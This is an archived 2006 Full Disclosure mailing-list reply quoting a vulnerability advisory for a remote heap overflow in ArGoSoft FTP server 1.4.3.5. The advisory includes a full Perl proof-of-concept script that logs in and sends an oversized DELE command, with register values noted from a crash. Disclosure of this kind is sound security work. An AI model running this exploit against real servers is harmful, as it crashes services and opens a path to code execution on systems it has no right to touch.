Full Disclosure mailing list archives
Re: ArGoSoft FTP server remote heap overflow
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Sat, 25 Feb 2006 21:31:53 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 you forgot to message the programmer of it before the public /slap on you ;-> Jerome Athias wrote:
-- Title: ArGoSoft FTP server remote heap overflow -- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and prior -- Affected Vendor: ArGoSoft - http://www.argosoft.com -- Impact: DoS, Arbitrary Code Execution -- Where:From remote-- Type: Heap Overflow -- Vulnerability Details: A remote attacker with valid credentials is able to trigger a heap overwrite in ArgoSoft FTP server. The bug occurs by providing a long argument to the DELE command. This vulnerability can allow remote attackers to execute arbitrary code or launch a denial of service attack. -- Credit: This vulnerability was discovered by Jerome Athias. https://www.securinfos.info/english/ #!/usr/bin/perl # ---------------------------------------------------- # # ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server # # Jerome Athias # # ---------------------------------------------------- # use Net::FTP; # geting data $host = @ARGV[0]; $port = @ARGV[1]; $debug = @ARGV[2]; $user = @ARGV[3]; $pass = @ARGV[4]; # =========== if (($host) && ($port)) { # make exploit string $exploit_string = "DELE "; $exploit_string .= "A" x 2041; $exploit_string .= "B" x 4; $exploit_string .= "C" x 1026; # On Win2K SP4 FR: # EAX 42424241 # ECX 43434343 # EDX 43434342 # EBX 43434B73 # =================== print "Trying to connect to $host:$port\n"; $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug=> $debug) or die "[-] Connection failed\n"; print "[+] Connect OK!\n"; print "Logging...\n"; if (!$user) { $user = "test"; $pass = "test"; } $sock->login($user, $pass); $answer = $sock->message; print "Sending string...\n"; $sock->quot($exploit_string); } else { print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n"; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBRAC+uK+LRXunxpxfAQK6Gw//U+rWA2lZwtNSF5ZUyXgPP7RaWwiFfdNP pLG3LjxGhj5nVvjbf5MDS3pbTHc09sCMXB/rapH1UJhYwvRva7Bc7Wp83TJrmMgg 8qOrKl269v/3Mv8VBZ3j4arxYVPp+JxEAK6HCNndOvgCKbhiZUVodJh45OWsa4zW b1N85Shxfw7Zv+Jb0vf4eY05lnzu7OgHxPOGsykaWTvtNtlZZMuxorGBUeL1lJmz s924HwIyKQnpZAmzSbXcBACPVBpqHR4WLRU6dyJkekt4lU0F80lsr5+qDsv9IVsA S8phar6sbo+VtaxSTh8Q9tK4NhI3WaYuKh9SRZ6ahniXN/69fqSnJSbDFdSBEQib 12NhjoiHPTSyAv1l2SdccRiRjtik6StMQjkbe9pgf3WGGerzXZuk4ckUFVblSpXR OW9Zrn1W11pPzcwI+laVUTFEmyTdWMh+yU1yQIPliu2G1IbsuBmXYsMj/5vLIDhj rCY/PopBtrI3/np+XN1Pq8mHwUwUeWw01K2kir7QUMNmn32LIA7UUjaACoEukINy eC8hVXoAOOc/ZUmr9Mfs391tdEdnO4ufOamTDwJ7KG/Ngxn54ic+vmIkyl3aUO3Q ZXeSKe1igZ9dEDJWSYhfyj8bgEXQcA4LhLgwCHXC150Ehp4d/1YQo3qIFBDrMt3m KIjI6zWxH10= =bA3R -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ArGoSoft FTP server remote heap overflow Jerome Athias (Feb 25)
- Re: ArGoSoft FTP server remote heap overflow ad () heapoverflow com (Feb 25)